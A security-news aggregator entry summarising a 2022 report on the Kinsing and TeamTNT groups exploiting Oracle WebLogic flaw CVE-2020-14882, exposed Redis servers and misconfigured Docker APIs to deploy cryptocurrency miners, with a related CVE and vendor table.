Security News > 2022 > September > Hackers Targeting WebLogic Servers and Docker APIs for Mining Cryptocurrencies

Hackers Targeting WebLogic Servers and Docker APIs for Mining Cryptocurrencies
2022-09-16 10:58

Malicious actors such as Kinsing are taking advantage of both recently disclosed and older security flaws in Oracle WebLogic Server to deliver cryptocurrency-mining malware.

The Kinsing actors have also been involved in campaigns against container environments via misconfigured open Docker Daemon API ports to launch a crypto miner and subsequently spread the malware to other containers and hosts.

The latest wave of attacks entails the actor weaponizing CVE-2020-14882, a two-year-old remote code execution bug, against unpatched servers to seize control of the server and drop malicious payloads.

"TeamTNT has been scanning for a misconfigured Docker Daemon and deploying alpine, a vanilla container image, with a command line to download a shell script to a C2 server," Aqua Security researcher Assaf Morag said.

Two other attacks mounted by the group entail the exploitation of exposed Redis servers and misconfigured Docker APIs to deploy coin miners and Tsunami binaries.

TeamTNT's targeting of Docker REST APIs has been well-documented over the past year.


News URL

https://thehackernews.com/2022/09/hackers-targeting-weblogic-servers-and.html

Related Vulnerability

DATE CVE VULNERABILITY TITLE RISK
2020-10-21 CVE-2020-14882 Unspecified vulnerability in Oracle Weblogic Server
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console).
0.0

Related vendor

VENDOR LAST 12M #/PRODUCTS LOW MEDIUM HIGH CRITICAL TOTAL VULNS
Docker 24 0 19 36 20 75